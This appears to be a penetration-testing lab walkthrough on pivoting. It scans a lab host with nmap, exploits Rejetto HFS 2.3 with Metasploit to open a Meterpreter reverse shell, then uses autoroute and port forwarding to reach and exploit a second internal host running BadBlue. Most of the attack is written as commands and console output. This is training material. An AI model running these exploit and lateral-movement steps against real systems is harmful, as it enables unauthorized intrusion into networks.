Pivoting

Pivoting

Navigation

Sections in This Note


Pivoting

Pivoting is a post-exploitation technique involving utilizing a compromised host to attack other systems on the compromised host's private internal network. After gaining access to one host, we can use it to exploit other hosts on the same internal network which we previously couldn't access. Meterpreter provides the ability to add a network route to the internal network's subnet, and consequently scan and exploit other systems on the network.

run autoroute -s (IPaddress)

Step 1–2: Nmap scan of the target.

nmap 10.0.23.180
root@attackdefense:~# nmap 10.0.23.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 16:57 IST
Nmap scan report for 10.0.23.180
Host is up (0.057s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
root@attackdefense:~#

Step 3: We've discovered multiple open ports. Run nmap again to determine version information on port 80.

Command: nmap -sV -p 80 10.0.23.180
root@attackdefense:~# nmap -sV -p 80 10.0.23.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 16:57 IST
Nmap scan report for 10.0.23.180
Host is up (0.060s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
root@attackdefense:~#

Step 4: Search the exploit module for HFS file server using searchsploit.

Command: searchsploit hfs

Step 5: Rejetto HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploit the target server using Metasploit.

Commands:
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.0.23.180
exploit
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.0.23.180
RHOSTS => 10.0.23.180
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.2:4444
[*] Using URL: http://0.0.0.0:8080/NAT6s85wCG
[*] Local IP: http://10.10.15.2:8080/NAT6s85wCG
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /NAT6s85wCG
[*] Sending stage (175174 bytes) to 10.0.23.180
[*] Meterpreter session 1 opened (10.10.15.2:4444 -> 10.0.23.180:49217) at 2021-04-07 16:59:43 +0530
[!] Tried to delete %TEMP%\GrXXSphPd.vbs, unknown result
[*] Server stopped.

meterpreter >
meterpreter > ipconfig

Interface 1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 12
============
Name         : AWS PV Network Device #0
Hardware MAC : 06:b4:67:1a:5e:26
MTU          : 9001
IPv4 Address : 10.0.23.180
IPv4 Netmask : 255.255.240.0
IPv6 Address : fe80::297a:1acb:24ac:8cd8
IPv6 Netmask : ffff:ffff:ffff:ffff::

Step 6: Add a route to the internal subnet.

meterpreter > run autoroute -s 10.0.23.0/20

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.23.0/255.255.240.0...
[+] Added route to 10.0.23.0/255.255.240.0 via 10.0.23.180
[*] Use the -p option to list all active routes
meterpreter >

Step 7: Run the port scanner on the second machine.

Commands:
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.27.99
set PORTS 1-100
exploit

Step 8: We've discovered port 80 on the pivot machine. Forward the remote port 80 to local port 1234 and grab the banner using Nmap.

Commands:
sessions -i 1
portfwd add -l 1234 -p 80 -r 10.0.27.99
portfwd list

Step 9: Use Nmap to find the running application name and version (don't close msfconsole).

Command: nmap -sV -sS -p 1234 localhost

Step 10: Search the exploit module for badblue 2.7 using searchsploit.

Command: searchsploit badblue 2.7
Exploit Title
------------------------------------------------------------------------
BadBlue 2.72 - PassThru Remote Buffer Overflow
BadBlue 2.72b - Multiple Vulnerabilities
Working Resources BadBlue - ...
Papers: No Result
root@attackdefense:~#

Step 11: There's a Metasploit module for badblue server. Use the PassThru remote buffer overflow module to exploit the target.

Commands:
use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS 10.0.27.99
exploit
[*] Trying target BadBlue EE 2.7 Universal...
[*] Started bind TCP handler against 10.0.27.99:4444
[*] Sending stage (175174 bytes) to 10.0.27.99
[*] Meterpreter session opened...

LINUX Exploitation

MSF provides various post-exploitation modules for both Windows and Linux.

Visual Diagram

flowchart LR
A[Attacker]-->B[Compromised Host]
B-->C[Internal Network]
C-->D[Internal Target]
B-.route/portfwd.->A
Powered by Forestry.md